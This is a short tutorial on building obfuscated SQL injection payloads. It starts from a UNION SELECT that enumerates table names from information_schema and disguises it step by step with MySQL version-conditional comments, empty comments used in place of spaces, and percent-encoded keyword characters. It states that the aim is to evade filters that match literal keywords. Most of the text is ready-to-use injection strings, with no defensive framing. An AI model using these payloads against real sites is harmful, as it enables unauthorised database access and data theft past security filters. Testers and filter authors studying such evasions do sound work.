Create encoded SQL payloads

In this part I would like to give an example of how to build an encoded (obfuscated) payload step by step.

First we are going to define the payload that we want to encode:

union select 1,2,3,concat(table_name),5 from information_schema.tables where table_schema = database()

In this case the payload is not encoded at all. The same payload can also be written in other ways, simply by changing its syntax and adding extra tokens, still without any encoding, for example:

union all(select 1,2,3,concat(table_name),5) from information_schema.tables where table_schema = database()

To start encoding, we first use the comment method: MySQL version-conditional comments (/*!50000 ... */), whose contents the server still executes, and empty comments (/**/) in place of spaces:

/*!50000union*//**//*!50000all*/(/*!50000select*//**/1,2,3,/*!50000concat*/(table_name),5)/**//*!50000from*//**//*!50000information_schema.tables*//**//*!50000where*//**//*!50000table_schema*/=database()

Now the payload is encoded with comments, but encodings can be mixed, for example with the URL method, percent-encoding some of the characters inside the keywords:

/*!50000%75%6e%69on*//**//*!50000all*/(/*!50000%73%65%6cect*//**/1,2,3,/*!50000%63oncat*/(table_name),5)/**//*!50000%66rom*//**//*!50000%69nformation_schema.tables*//**//*!50000wh%65re*//**//*!50000table_schema*/=database()

In this way, filters that match only on literal keywords can be evaded by combining different encodings and mixing them in various ways.
